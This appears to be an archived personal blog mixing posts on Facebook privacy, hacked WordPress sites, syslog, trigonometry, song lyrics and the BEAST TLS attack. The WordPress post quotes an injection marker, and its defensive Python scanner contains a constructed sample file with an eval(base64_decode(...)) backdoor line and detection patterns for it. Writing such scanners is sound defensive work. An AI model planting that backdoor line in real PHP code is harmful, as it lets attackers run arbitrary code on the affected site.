Eikonal Blog

2010.04.30

Facebook privacy? What Facebook privacy?

Filed under: FaceBook, privacy — sandokan65 @ 10:01

Absence of user data privacy at FaceBook:

2010.05.22:

2010.05.21:

  • an insightful comment in the user discussion thread “How would you grade Facebook’s handling of users’ privacy?” (The Wall Street Journal, 2010.05.21) – http://online.wsj.com/community/groups/privacy-law-280/topics/how-would-you-grade-facebooks:

      Keep in mind, the CEO is still a punk. I don’t care how smart he may be, how much real-life experience and business experience could Zuckerberg really have? Do you expect him to be looking out for your best interests? Not a chance. He’s just another Silicon Valley huckster out to make money on YOUR information.

      I’ve been on FB for about 1.5 years now and I’ve always been skeptical about how good their privacy is. Consequently, I don’t do ANY Facebook apps. No matter which app you choose, they all require complete access to not only MY information but also to any of my FRIEND’S information. It’s one thing to give access for me, but I can’t abide by compromising my friend’s info.

      Keep in mind FB users: when you friend someone on FB, not only do they have access to all of your posts, but they also have access to any posts that your friends put on your wall. And…if your friends have “light” privacy settings, all sorts of insights could be gained by anyone about you or your friends.

  • “Facebook, MySpace Confront Privacy Loophole” (WSJ.com, 2010.05.21) – http://online.wsj.com/article/SB10001424052748704513104575256701215465596.html

      Facebook, MySpace and several other social-networking sites have been sending data to advertising companies that could be used to find consumers’ names and other personal details, despite promises they don’t share such information without consent.

      … Most social networks haven’t bothered to obscure user names or ID numbers from their Web addresses, said Craig Wills, a professor of computer science at Worcester Polytechnic Institute, who has studied the issue.

      The sites may have been breaching their own privacy policies as well as industry standards, which say sites shouldn’t share and advertisers shouldn’t collect personally identifiable information without users’ permission. Those policies have been put forward by advertising and Internet companies in arguments against the need for government regulation. …

      … For most social-networking sites, the data identified the profile being viewed but not necessarily the person who clicked on the ad or link. But Facebook went further than other sites, in some cases signaling which user name or ID was clicking on the ad as well as the user name or ID of the page being viewed. By seeing what ads a user clicked on, an advertiser could tell something about a user’s interests. …

      …”If you are looking at your profile page and you click on an ad, you are telling that advertiser who you are,”…

2010.05.19:

2010.05.17:

  • Facebook helps you connect and share with the people in your life. Whether you want to or not. – http://youropenbook.org/

      # What has Facebook done wrong?

      1) Facebook has made two clear mistakes here. First, they do not do a good job of indicating how public each piece of information you share on the site will be.

      2) Second, they change the rules far too often. If you understood Facebook’s privacy settings two years ago (or even six months ago) that information would be worse than useless with today’s bewildering settings.

      # How can I tell what information Facebook is sharing about me?

      There is a project here to make this information clear: http://www.rabidgremlin.com/fbprivacy/. However be warned that it does require that you trust the author of that project.

2010.05.16:

2010.05.15:

2010.05.14:

2010.05.13:

2010.05.12:

  • “The Big Game, Zuckerberg and Overplaying your Hand” (The Jason Calacanis Weblog blog) – http://calacanis.com/2010/05/12/the-big-game-zuckerberg-and-overplaying-your-hand/

      Who’s been Zucked and how? Let’s take a look back:

    • 1. FourSquare was Zucked when Facebook stole their check-in feature.
    • 2. Twitter was Zucked when Facebook stole their public facing profiles.
    • 3. Facebook users got Zucked when the site flipped their privacy
      setting–three different times!
    • 4. The co-founder of Facebook was allegedly Zucked when he was kicked out of the company he helped found.
    • 5. The founders of ConnectU got Zucked when he allegedly screwed them over by not delivering their social network and then launching Facebook at the same time–and joked about it!
    • 6. Harvard reporters reportedly got Zucked when Mark hacked their accounts to try and stop a negative story/investigation about him.
  • “Facebook’s Open Disdain For Privacy” by John Gapper (Business Insider, 2010.05.12) – http://www.businessinsider.com/mark-zuckerberg-has-recently-been-displaying-a-disregard-bordering-on-disdain-for-facebook-users-privacy-2010-5

2010.05.10:

  • “10 Things to Remember About Facebook Privacy and Security” by Don Reisinger (eWeek, 2010.05.10) – http://www.eweek.com/c/a/Cloud-Computing/10-Things-to-Remember-About-Facebook-Privacy-and-Security-495804/
    • 1. There are privacy concerns
    • 2. There are holes
    • 3. Others can only get what they’re offered
    • 4. Children have no place on Facebook
    • 5. Facebook’s privacy settings are actually useful
    • 6. The Web isn’t the place to share sensitive information
    • 7. Sometimes privacy isn’t best for a social network
    • 8. The alternatives aren’t any better
    • 9. Some privacy is gone forever
    • 10. It’s easy to blame Facebook

2010.05.07:

2010.05.05:

2010.05.04:

  • How to Delete Your Facebook Account with Extreme Prejudice (and a Bit of Style) – http://bit.ly/fb-privacy-with-style (YouTube)
  • “Top Ten Reasons You Should Quit Facebook” by Dan Yoder (GizModo) – http://gizmodo.com/5530178/

    • 10. Facebook’s Terms Of Service are completely one-sided
    • 9. Facebook’s CEO has a documented history of unethical behavior
    • 8. Facebook has flat out declared war on privacy
    • 7. Facebook is pulling a classic bait-and-switch
    • 6. Facebook is a bully
    • 5. Even your private data is shared with applications
    • 4. Facebook is not technically competent enough to be trusted
    • 3. Facebook makes it incredibly difficult to truly delete your account
    • 2. Facebook doesn’t (really) support the Open Web
    • 1. The Facebook application itself sucks

2010.05.03:

2010.05.02:

  • “Erasing Your Digital Tracks on the Web” by Tony Bradley (PcWorld, 2010.05.02) – http://www.pcworld.com/article/195270/xxx.html
    We routinely enter personal information at various sites on the Web–and the Internet never forgets. Here are some sound ways to take your data back.

    Almost half a billion people are members of Facebook, and you may very well be one of them. But have you read the Facebook Privacy Policy? If you’re like most people, the answer is no, in which case you may be only vaguely (or not at all) aware of what that policy’s mind-numbing text says with regard to the myriad ways that Facebook may share your information with other parties.

2010.04.30:

2010.04.28:

  • “Report: Facebook CEO Mark Zuckerberg Doesn’t Believe In Privacy” by Eliot Van Buskirk (Wired, 2010.04.28) – http://www.wired.com/epicenter/2010/04/report-facebook-ceo-mark-zuckerberg-doesnt-believe-in-privacy/
    “Off record chat w/ Facebook employee,” begins Bilton’s fateful tweet. “Me: How does Zuck feel about privacy? Response: [laughter] He doesn’t believe in it.”
  • “Facebook’s High Pressure Tactics: Opt-in or Else” by Sarah Perez (ReadWriteWeb, 2010.04.28) – http://www.readwriteweb.com/archives/facebooks_high_pressure_tactics_opt-in_or_else.php
    But even for those who actually do consider the implications of everything about themselves being made public, they’ll soon encounter another issue. Something that Li didn’t explain in the cheery blog post was what would happen if you refused to link to these new Pages: your profile information will be removed and your profile page will be left empty.

    … So what should your takeaway be from all this mess? Look before you link.

    In fact, it may be best if you just assume that everything on Facebook will be public from now on and act accordingly.
  • “Five ways Facebook should improve user privacy” by Ian Paul (PC World) – http://www.macworld.com/article/150901/2010/04/facebook_privacy.html
  • “A Handy Facebook-to-English Translator” by Richard Esguerra (EFF 2010.04.28) – https://www.eff.org/deeplinks/2010/04/handy-facebook-english-translator

    Term – Meaning (with examples):

    • Public information – This is the term Facebook uses to describe information that it wants to share with anybody and everybody. Knowing what information Facebook considers “public” at any given moment can be confusing, but it’s key to understanding what information Facebook may share with its business partners without seeking further permission. Any time “public information” is referenced now, Facebook is talking about your: name, profile picture, current city, gender, networks, complete list of your friends, and your complete list of connections (formerly the list of pages that you were a “fan” of, but now including profile information like your hometown, education, work, activities, likes and interests, and, in some cases, your likes and recommendations from non-Facebook pages around the web).
    • Visibility – Facebook offers a number of controls over what information is “visible” on your profile. This determines what can be seen by someone who visits your profile page, but does not change whether the information is “public information.” “Keep in mind that Facebook Pages you connect to are public. You can control which friends are able to see connections listed on your profile, but you may still show up on Pages you’re connected to.” Likewise, “While you do have the option to hide your Friend List from being visible on your profile, it will be available to applications you use and websites you connect with using Facebook.” Because Facebook deems this information “public,” it reserves the right to share that information with its business partners and third party websites, regardless of your visibility settings.
    • Pages – Facebook’s “Pages” are distinct from regular Facebook user profiles, and have generally been used to represent non-user entities like companies, non-profits, products, sports teams, musicians, etc. Community Pages are a new type of Page “dedicated to a topic or experience,” such as cooking. These will replace interests and activities. Last December, Facebook made your Page affiliations available to everyone — non-Friends, advertisers, and data miners included — by classifying Pages as publicly available information.
    • Connections – You create a “Connection” to most of the things that you click a “Like button” for, and Facebook will treat those relationships as public information. If you Like a Page on Facebook, that creates a public connection. If you Like a movie or restaurant on a non-Facebook website (and if that site is using Facebook’s OpenGraph system), that creates a public connection to either the applicable Page on Facebook or the affiliated website. Last week, Facebook announced a plan to transform most of the bits in your profile (including your hometown, education, work, activities, interests, and more) into connections, which are public information. If you refuse to make these items into a Connection, Facebook will remove all unlinked information.
    • Social plugins – Social plugins allow other websites to incorporate Facebook features and share data with Facebook. Examples of social plugins include “Like buttons” that share information back to your Facebook profile when clicked; an “Activity Feed” that will show content that you’ve Liked on that site to Facebook friends; and more. From the Facebook FAQ: “If you click “Like” or make a comment using a social plugin, your activity will be published on Facebook and shown to your Facebook friends who see an Activity Feed or Recommendations plugin on the same site. The things you like will be displayed publicly on your profile.”
    • OpenGraph – OpenGraph is a new Facebook program that grants any website a way to create objects that can become “connections” on Facebook user profiles. At the moment, some sites appear to be using OpenGraph in conjunction with the Facebook “Like button” in order to publish information back to your Facebook profile’s list of Pages — information that everyone is able to see. For example, the Internet Movie Database (IMDb) appears to be using OpenGraph in conjunction with the Like button social plugin. When you click to Like a movie on IMDb, that movie gets added to your list of Pages.
    • Instant Personalization – Instant Personalization is a pilot program that allows a few non-Facebook websites to obtain and make use of your public Facebook information as soon as you visit those websites. For example, the music website Pandora receives access to the list of music artists that you Liked on Facebook in order to pick songs to play (for users who are logged into Facebook and who have not opted out of instant personalization). For users that have not opted out, Instant Personalization is instant data leakage. As soon as you visit the sites in the pilot program (Yelp, Pandora, and Microsoft Docs) the sites can access your name, your picture, your gender, your current location, your list of friends, all the Pages you have Liked — everything Facebook classifies as public information. Even if you opt out of Instant Personalization, there’s still data leakage if your friends use Instant Personalization websites — their activities can give away information about you, unless you block those applications individually.

2010.04.27:

2010.04.26:

2010.04.25:

2010.04.23:

2010.04.22:

  • “How to Delete Facebook Applications (and Why You Should)” by Sarah Perez (Read Write Web, 2010.04.22) – http://www.readwriteweb.com/archives/how_to_delete_facebook_applications_and_why_you_should.php
      At Facebook’s f8 conference, founder and CEO Mark Zuckerberg announced that the company was removing restrictions on user data retention within Facebook applications. Previously, the company had a policy where developers couldn’t “store and cache any data for more than 24 hours,” Zuckerberg said while speaking to the audience of Facebook developers crowded into the San Francisco Design Center on Wednesday. “We’re going to go ahead and…get rid of that policy,” he said. The audience cheered. …
      …. How to Remove Facebook Applications: … there is something very easy everyone can do to minimize their risk and that’s delete the Facebook applications you no longer use. The process of doing so is incredibly simple. After signing into Facebook, do the following:

      • 1. Click on “Account” at the top-right of the screen.
      • 2. Click “Application Settings”
      • 3. Change the “Show” drop-down box to “Authorized.” This will show all the applications you’ve ever given permission to.
      • 4. In the resulting list, click the “X” button on the far right next to each app you want to remove to delete it.
      • 5. On the pop-up box that appears, click “Remove” then click “Okay” on the next box confirming the app was deleted.

      Repeat this process to remove all the apps you no longer use on a regular basis….

  • “Facebook’s Ambition” by Robert Scoble (Business Insider, 2010.04.22) – http://www.businessinsider.com/facebooks-ambition-2010-4
  • “Facebook Plots its Future: Will it Be Our Overlord?” by Peter Smith (PCWorld, 2010.04.22) – http://www.pcworld.com/article/194765/facebook_plots_its_future_will_it_be_our_overlord.htmll
  • “Why I, Like, Really Dislike Facebook’s ‘Like’ Button” by Dan Tynan (PCWorld, 2010.04.22) – http://www.pcworld.com/article/194818/why_i_like_really_dislike_facebooks_like_button.html
  • “Facebook: Privacy Enemy Number One?” by Dan Costa (PCMagazine, 2010.04.22) – http://www.pcmag.com/article2/0,2817,2362967,00.asp
  • “How to Opt Out of Facebook’s Instant Personalization” by Kurt Opsahl (EFF, 2010.04.22) – http://www.eff.org/deeplinks/2010/04/how-opt-out-facebook-s-instant-personalization

2010.04.21:

2010.04.13:

  • “What’s a Little Cyberbullying Among Friends? Facebook Launches New Safety Center” by Sarah Perez (ReadWriteWeb, 2010.04.13) – http://www.readwriteweb.com/archives/facebook_launches_safety_center_to_educate_users.php

      … It’s a somewhat ironic statement from a company that recently prompted its 400-plus million users to accept “recommended” changes that opened up their data – including status updates, photos, videos, links and friend lists – to a public audience, revealing details that many users assumed were private.

      Around the same time as the “privacy debacle,” as we like to call it, unfolded, Facebook also announced a “Safety Advisory Board,” a group whose purpose is to review safety-related procedures and documentation as well as make suggestions regarding best practices and other procedures. How about this safe practice, Facebook: don’t publicize people’s private information?

2010.04.10:

2010.04.05:

2010.03:

2010.02:

2010.01:

Older:

General:


Related:

2010.04.27

WordPress attacks

Filed under: infosec — sandokan65 @ 13:28

Following a link posted recently in the sci.physics.research USENET newsgroup, I stumbled upon an example of the WordPress exploit that several sites wrote about recently. The web server redirects your browser request to a URL that has the following string appended to the originally requested URL:

%&evalbase64_decode_SERVERHTTP_EXECCODE.+&%/

The content of that page is:

400 Bad Request
-----------------------------------------------------
nginx

This is the first example (that I have seen) of a hacked WordPress-based blog.

The discussion at http://wordpress.org/support/topic/383414 gives some useful links on that type of hack:

If that’s happening on your blog, then you’ve been hacked.

Make a new backup of your files and database and save that:

Give this a good read:
http://codex.wordpress.org/FAQ_My_site_was_hacked

This is also good and referenced in that article: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

Once you’ve deloused your installation consider hardening your blog using this guide:
http://codex.wordpress.org/Hardening_WordPress
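
As an added example (not from this post, the forum thread, or the linked guides), a small Python scanner for the two traces this kind of compromise leaves: the eval(base64_decode(...)) stanza injected into PHP files, and the same construct riding on redirect URLs, of which the bare marker quoted above is the punctuation-stripped form. The sample plugin files, the site layout and the redirect URLs are constructed; the injected line eval(base64_decode($_SERVER['HTTP_EXECCODE'])) is an assumption reconstructed from the marker’s _SERVERHTTP_EXECCODE fragment, not something copied from a real infection.

```python
import re
import urllib.parse

# The injected PHP stanza: eval(base64_decode( with whatever argument follows.
# The bare marker quoted in the post is this construct with its punctuation stripped.
INJECTED_EVAL = re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)


def scan_php(source: str) -> list:
    """Return (line number, offending line) for every eval(base64_decode( in one PHP file."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        if INJECTED_EVAL.search(line):
            hits.append((n, line.strip()))
    return hits


def scan_site(files: dict) -> dict:
    """Scan a {path: source} mapping and report only the .php files that have hits."""
    report = {}
    for path, source in files.items():
        if path.endswith(".php"):
            hits = scan_php(source)
            if hits:
                report[path] = hits
    return report


def redirect_is_suspicious(location: str) -> bool:
    """True when a redirect target carries an eval(base64_decode(...)) marker,
    whether or not it arrives percent-encoded."""
    decoded = urllib.parse.unquote(location).lower()
    return re.search(r"\beval\b", decoded) is not None and "base64_decode" in decoded


# Constructed sample files: a clean plugin and the same plugin with the stanza injected
# as line 3. The $_SERVER['HTTP_EXECCODE'] argument is an assumption (see lead-in).
CLEAN_PHP = (
    "<?php\n"
    "/* Plugin Name: Example (constructed) */\n"
    "function example_init() { add_action('init', 'example_hook'); }\n"
)
INFECTED_PHP = (
    "<?php\n"
    "/* Plugin Name: Example (constructed) */\n"
    "eval(base64_decode($_SERVER['HTTP_EXECCODE']));\n"
    "function example_init() { add_action('init', 'example_hook'); }\n"
)
SITE = {
    "wp-content/plugins/example/example.php": INFECTED_PHP,
    "wp-content/plugins/other/other.php": CLEAN_PHP,
    "wp-content/uploads/readme.txt": "eval(base64_decode(",  # not .php, so not scanned here
}

if __name__ == "__main__":
    for path, hits in scan_site(SITE).items():
        for n, line in hits:
            print(f"{path}:{n}: {line}")
    print(redirect_is_suspicious("http://example.com/page/%25%26eval%28base64_decode%28x%29%29/"))
```

If the injected argument really is $_SERVER['HTTP_EXECCODE'], that is PHP’s name for a request header called Execcode, so the code that gets executed arrives in a request header rather than in the file or the URL: the scanner finds the hook, but the payload itself would only show up in request logs that record headers. Either way the remedy is the one the thread gives: back up, then follow the clean-up and hardening guides above.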

2010.04.26

War of the gods

Filed under: music — Tags: , — sandokan65 @ 22:45

Billy Paul – 1973

The time has come, for bad things to end
The time has come, for life to begin
The time has come for the War of the Gods

Lucifer, oh lucifer
God of evil, you're the god of hate
We see you every day
Father of the light
Your main man died
When the light shines
You're running hot
The darkness is when you find your light
Master of tricks,the master of pain
I said;
You're the one, you're the one who has no shame
Lucifer, Sa-tan the devil's your name
Do you have time to get your army ready
You know love conquers all
Will you stand, will you stand
Or will you fall
The time has come
For bad things to end
The time has come
For life to begin
The time has come
For the War of the Gods

God is just a title
It's like calling somebody father,
Preacher, President or General
Allah, Buddha, Hare Krishna,
Jehova, just the mention of you
Some people even call, call Jesus God too.

Love, Peace and Eternal Life
Is every word
To anyone who knocks on your doors

There’s only one God that’s true

You know,
The name is not the same
One day the people of the world
Will know your Great Name
You are the Strong
And you are The Mighty
I hope I’m with you
When they start the fighting
The War of the Gods

Love, Peace and Eternal Life
Is what I want
Love, Peace and Eternal Life
Is what I want

God, God
You are The Strong
And you are The Mighty
I hope I'm with You
When they start the fighting
Lawd!

Lucifer,
Satan, the devil's your name,
Have you had time,
to get your army ready?
to get your army ready?


Lucifer, god of evil
Hey, we see you everyday:
The father of the light
He knows you start to running hot

The darkness,
Is where, is where, is where, is where, is where
Gotta talk ‘bout you because that's you find you're the light

God!
????
God!
You make you feel so good this morning

God!

We gon talk about,

Lucifer, lucifer, lucifer, lucifer,

God....Kicked you out of heaven
cause you didn’t pay your rent.

God.....Kicked you out of heaven
cause you didn’t pay your rent.

God.....Kicked you out of heaven
cause you didn’t pay your rent.

And He is The Strong
He is The Mighty… 

2010.04.24

Modern art

Filed under: art and fun — sandokan65 @ 20:53

GOTO: Interesting visual arts sites – https://eikonal.wordpress.com/2011/04/15/interesting-visual-arts-sites/

2010.04.22

Social networks privacy

Filed under: privacy — Tags: — sandokan65 @ 12:41
  • “Hotmail’s social networking busts your privacy” by Woody Leonhard (WindowsSecrets, 2010.04.22) – http://windowssecrets.com/comp/100422#story1
      In its rush to take on Facebook and Google Buzz, Microsoft is now collecting and displaying personal information on your Hotmail page — information you may never have wanted to broadcast….

Related:

2010.04.20

Unix hardening

General

Passwords

Logging and auditing


Related:

2010.04.14

Soviet Socialist Republic Of USA

Filed under: society — Tags: — sandokan65 @ 14:37

Er, not really. See “Nine Myths about Socialism in the US” (2010.04.10 @ CommonDreams.org) by Bill Quigley – http://www.commondreams.org/view/2010/04/10

2010.04.13

Logging

Filed under: infosec, logging — Tags: , , , , , , — sandokan65 @ 14:27

Sites

Logging tools

Articles and Papers

Syslog

    The standard UNIX syslog facilities are

    • kern – kernel
    • user – application or user processes (this is the default if the application sending a message does not specify the facility)
    • mail/news/UUCP/cron – electronic mail/NNTP/UUCP/cron subsystems
    • daemon – system daemons
    • auth – authentication (login) and authorization related messages
    • lpr – line printer spooling subsystem
    • mark – inserts timestamp into log data at regular intervals
    • local0-local7 – 8 facilities for customized auditing
    • syslog – internal messages generated by syslog itself
    • authpriv – security/authorization messages like auth, but meant for a log file with restricted permissions (the sensitive variant of auth)
    • * — on most versions of UNIX, refers to all facilities except mark

    Syslog message levels:

    • 0 Emergency (emerg) – system is or will be unusable if situation is not resolved
    • 1 Alert (alert) – immediate action required
    • 2 Critical (crit) – critical conditions
    • 3 Error (err) – error conditions
    • 4 Warning (warning) – warning conditions, recoverable errors
    • 5 Notice (notice) – normal but significant condition; unusual situation that merits investigation; a significant event that is typically part of normal day-to-day operation
    • 6 Informational (info) – informational messages
    • 7 Debug (debug) – debug-level messages; verbose data for debugging

    Syslog actions:

    • filename – write message to the specified file on the local machine
    • @hostname or @ipaddress – forward message to remote loghost
    • user1,user2,… — write message to consoles of users named in list, if user is logged-in
    • * — write message to all logged-in users
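
The facility, level and action tables above, turned into running code as an added example (not from the page): a decoder for the <PRI> prefix a syslog daemon or relay receives, and an evaluator for syslog.conf selectors that applies the rule that facility.level means “that level and anything more urgent”, with .none exclusions and the usual last-selector-wins ordering. The numeric facility codes come from RFC 3164 (PRI = facility * 8 + severity), which the page does not list; the rule set and the sample log lines are constructed.

```python
import re

# Facility and severity codes as assigned by RFC 3164 (PRI = facility * 8 + severity).
# mark has no PRI code: it is internal to the daemon, which is why "*" never includes it.
FACILITY_NAMES = {
    0: "kern", 1: "user", 2: "mail", 3: "daemon", 4: "auth", 5: "syslog",
    6: "lpr", 7: "news", 8: "uucp", 9: "cron", 10: "authpriv", 11: "ftp",
    16: "local0", 17: "local1", 18: "local2", 19: "local3",
    20: "local4", 21: "local5", 22: "local6", 23: "local7",
}
SEVERITY_NAMES = {0: "emerg", 1: "alert", 2: "crit", 3: "err",
                  4: "warning", 5: "notice", 6: "info", 7: "debug"}
SEVERITY_CODES = {name: code for code, name in SEVERITY_NAMES.items()}
SEVERITY_CODES.update({"panic": 0, "error": 3, "warn": 4})   # accepted aliases

PRI_RE = re.compile(r"^<(\d{1,3})>")


def parse_pri(line: str) -> tuple:
    """Split the <PRI> prefix into (facility, severity). A line with no valid PRI
    is treated as <13> = user.notice, as RFC 3164 tells relays to do."""
    m = PRI_RE.match(line)
    pri = int(m.group(1)) if m else 13
    if pri > 191:                 # 23 * 8 + 7 is the largest valid PRI
        pri = 13
    return pri // 8, pri % 8


def selector_matches(selectors: str, facility: int, severity: int) -> bool:
    """Evaluate a selector list such as '*.info;mail.none;auth,authpriv.none'.
    facility.level matches that facility at the given level or any more urgent one
    (numerically lower); '=level' is exactly that level; 'none' excludes; '*' is all.
    Selectors apply left to right and the last one naming the facility wins."""
    fname = FACILITY_NAMES.get(facility, "unknown")
    matched = False
    for sel in selectors.split(";"):
        facs, _, level = sel.strip().rpartition(".")
        names = [f.strip() for f in facs.split(",")]
        if "*" not in names and fname not in names:
            continue
        if level == "none":
            matched = False
        elif level == "*":
            matched = True
        elif level.startswith("="):
            matched = severity == SEVERITY_CODES[level[1:]]
        else:
            matched = severity <= SEVERITY_CODES[level]
    return matched


def route(line: str, rules: list) -> list:
    """Return the actions (file, @host, user list or *) a line would be delivered to."""
    fac, sev = parse_pri(line)
    return [action for selectors, action in rules if selector_matches(selectors, fac, sev)]


# Constructed rule set, in syslog.conf order: (selector list, action)
RULES = [
    ("auth,authpriv.*", "/var/log/auth.log"),
    ("*.info;mail.none;auth,authpriv.none", "/var/log/messages"),
    ("mail.*", "/var/log/mail.log"),
    ("kern.crit", "@loghost"),
    ("*.emerg", "*"),
]

# Constructed sample lines in BSD syslog format (PRI in angle brackets)
SAMPLES = [
    "<34>Oct 11 22:14:15 mymachine su: 'su root' failed for lonvick on /dev/pts/8",
    "<0>Oct 11 22:14:16 mymachine kernel: panic: out of memory",
    "<22>Oct 11 22:14:17 mymachine postfix/smtpd[1234]: connect from unknown",
    "<15>Oct 11 22:14:18 mymachine myapp[42]: debug: cache miss",
    "Oct 11 22:14:19 mymachine cron[7]: no PRI on this line",
]

if __name__ == "__main__":
    for s in SAMPLES:
        f, v = parse_pri(s)
        print(f"{FACILITY_NAMES[f]}.{SEVERITY_NAMES[v]:8} -> {route(s, RULES)}")
```

Two things worth noticing in the output: the <15> line is user.debug and lands nowhere, because *.info stops at info, and the kern.emerg line hits three actions at once, since a message can satisfy any number of rules.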

    Links:

Memetics

The secret life of misquotes

Various


More: Memetic diseases – https://eikonal.wordpress.com/2011/05/12/memetic-diseases/

2010.04.09

Simple expression for trigonometric functions of multiple of an angle

Filed under: mathematics — Tags: , , , , , , — sandokan65 @ 15:16
  • \sin(n x) = \frac{i}2 [(\cos(x)-i \sin(x))^n - (\cos(x)+i \sin(x))^n],
  • \cos(n x) = \frac12 [(\cos(x)-i \sin(x))^n + (\cos(x)+i \sin(x))^n],
  • \tan(n x) = i \frac{(1-i \tan(x))^n - (1+i \tan(x))^n}{(1-i \tan(x))^n + (1+i \tan(x))^n}

Examples:

  • \sin(2x) = 2 \sin(x) \cos(x),
  • \sin(3x) = \sin(x) [3\cos(x)^2-\sin(x)^2],
  • \sin(4x) = 4 \sin(x) \cos(x) [\cos(x)^2-\sin(x)^2],
  • \sin(5x) = \sin(x) [5 \cos(x)^4 - 10 \cos(x)^2 \sin(x)^2 + \sin(x)^4],
  • \cos(2x) = [\cos(x)^2-\sin(x)^2] ,
  • \cos(3x) = \cos(x) [\cos(x)^2- 3 \sin(x)^2] ,
  • \cos(4x) = [\cos(x)^4 - 6 \cos(x)^2 \sin(x)^2 + \sin(x)^4],
  • \cos(5x) = \cos(x) [\cos(x)^4 - 10 \cos(x)^2 \sin(x)^2 + 5 \sin(x)^4],
  • \tan(2x) = \frac{2\tan(x)}{1-\tan(x)^2},
  • \tan(3x) = \frac{\tan(x)[3-\tan(x)^2]}{1-3\tan(x)^2},
  • \tan(4x) = \frac{4\tan(x)[1-\tan(x)^2]}{1-6\tan(x)^2+\tan(x)^4},
  • \tan(5x) = \frac{\tan(x)[5- 10 \tan(x)^2 + \tan(x)^4]}{1-10\tan(x)^2+5\tan(x)^4}, …
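
Where the three closed forms come from and how the examples follow, as a worked derivation added here (not part of the original post, same symbols as above): by de Moivre, (\cos(x)+i\sin(x))^n = \cos(nx)+i\sin(nx) and (\cos(x)-i\sin(x))^n = \cos(nx)-i\sin(nx). Subtracting the second from the first gives 2i\sin(nx), adding them gives 2\cos(nx), which are the first two formulas; dividing the sine form by the cosine form and then numerator and denominator by \cos(x)^n gives the \tan(nx) form. Expanding (\cos(x) \pm i\sin(x))^n with the binomial theorem and separating real and imaginary parts yields the polynomial identities that generate every example in the list:

  • \sin(nx) = \sum_{k=0}^{\lfloor (n-1)/2 \rfloor} (-1)^k \binom{n}{2k+1} \cos(x)^{n-2k-1} \sin(x)^{2k+1},
  • \cos(nx) = \sum_{k=0}^{\lfloor n/2 \rfloor} (-1)^k \binom{n}{2k} \cos(x)^{n-2k} \sin(x)^{2k},
  • \tan(nx) = \frac{\sum_{k} (-1)^k \binom{n}{2k+1} \tan(x)^{2k+1}}{\sum_{k} (-1)^k \binom{n}{2k} \tan(x)^{2k}}.

Check against n = 5: the k = 0, 1, 2 terms of the sine sum are 5\cos(x)^4\sin(x), -10\cos(x)^2\sin(x)^3 and \sin(x)^5, which is the \sin(5x) line above; the cosine sum gives \cos(x)^5 - 10\cos(x)^3\sin(x)^2 + 5\cos(x)\sin(x)^4, and dividing both by \cos(x)^5 gives the \tan(5x) line.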

Much more on the web:

Atheism, Secularism, Critical Thinking, etc

General

Richard Dawkins

Daniel Dennett

Christopher Hitchens

Various


Articles


Here at this blog: Bertrand Russell – https://eikonal.wordpress.com/2010/09/14/bertrand-russell/.

Shodan search engine

Filed under: infosec — Tags: — sandokan65 @ 13:24

A search engine that indexes service banners from Internet-facing hosts with exposed ports 21 (FTP), 22 (SSH), 23 (Telnet) and 80 (HTTP), so hosts are found by what they run rather than by page content.

More info:

2010.04.08

SSL/TLS In-Security

Filed under: infosec — Tags: , , , , , , — sandokan65 @ 13:53

2011.09: BEAST – Browser Exploit Against SSL/TLS

  • BEAST demo (2011.09.25) – http://vnhacker.blogspot.com/2011/09/beast.html
  • “Firefox devs mull dumping Java to stop BEAST attacks” (“‘Horrible user experience’ for your own good”) by Dan Goodin (The Register; 2011.09.29) – http://www.theregister.co.uk/2011/09/29/firefox_killing_java/
  • “World takes notice as SSL-chewing BEAST is unleashed- Google, Microsoft, Mozilla patch cracks in net’s foundation of trust” by Dan Goodin (The Register; 2011.09.27) – http://www.theregister.co.uk/2011/09/27/beast_attacks_paypay/
    • To be fair, Duong and Rizzo’s exploit isn’t the easiest to pull off. Attackers must already control the network used by the intended victim, and they can only recover secret information that’s transmitted repeatedly in a predictable location of the encrypted data stream. They must also have means to subvert a safety mechanism built into the web known as the same-origin policy, which dictates that data set by one domain name can’t be read or modified by a different address.
  • “Security impact of the Rizzo/Duong CBC “BEAST” attack” by EKR (2011.09.23) – http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html
  • “What does the SSL/TLS BEAST exploit mean for my web-based file transfer application?” by Jonathan Lampe (2011.09.20) – http://www.filetransferconsulting.com/file-transferbeast-tls-vulnerability/
  • “BEAST: Surprising crypto attack against HTTPS” – http://www.ekoparty.org/cronograma.php
      We present a new fast block-wise chosen-plaintext attack against SSL/TLS. We also describe one application of the attack that allows an adversary to efficiently decrypt and obtain authentication tokens and cookies from HTTPS requests. Our exploit abuses a vulnerability present in the SSL/TLS implementation of major Web browsers at the time of writing.
  • “Researchers Exploit Flaws in Browser SSL/TLS Encryption” by Brian Prince – http://www.securityweek.com/researchers-exploit-flaws-browser-ssltls-encryption
    • fast block-wise chosen-plaintext attack against SSL/TLS
    • “We also describe one application of the attack that allows an adversary to efficiently decrypt and obtain authentication tokens and cookies from HTTPS requests. Our exploit abuses a vulnerability present in the SSL/TLS implementation of major Web browsers at the time of writing.”
    • “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol,”
    • the attack impacts TLS 1.0 and SSL 3.0, but does not affect TLS versions 1.1 and 1.2
  • “Researchers crack SSL encryption” by Zeljka Zorz (Help Net Security; 2011.09.21) – http://www.net-security.org/secworld.php?id=11664
    • The revelation that the last two versions (1.1 and 1.2) of the TLS cryptographic protocol are safe from such an attack gives almost no satisfaction, as the overwhelming majority of websites protected by it support version 1.0.
    • BEAST consists of JavaScript code that gets inserted in the user’s browser and works with a network sniffer to decrypt the cookies that carry the information – username and password – that allows users to access their accounts.
    • “BEAST is different than most published attacks against HTTPS,” Duong shared with The Register. “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol. As far as we know, BEAST implements the first attack that actually decrypts HTTPS requests.”
    • He also claimed that with recently made improvements, it is able to decrypt a typical 1,000 to 2,000 characters long cookie in under ten minutes. Also, that other applications that use the vulnerable TLS version – such as instant messaging and VPN programs – could be attacked with BEAST.
  • “Hackers break SSL encryption used by millions of sites – Beware of BEAST decrypting secret PayPal cookies” by Dan Goodin (The Register; 2011.09.19) – http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/
    • Although TLS 1.1 has been available since 2006 and isn’t susceptible to BEAST’s chosen plaintext attack, virtually all SSL connections rely on the vulnerable TLS 1.0, according to recent research from security firm Qualys that analyzed the SSL offerings of the top 1 million internet addresses.
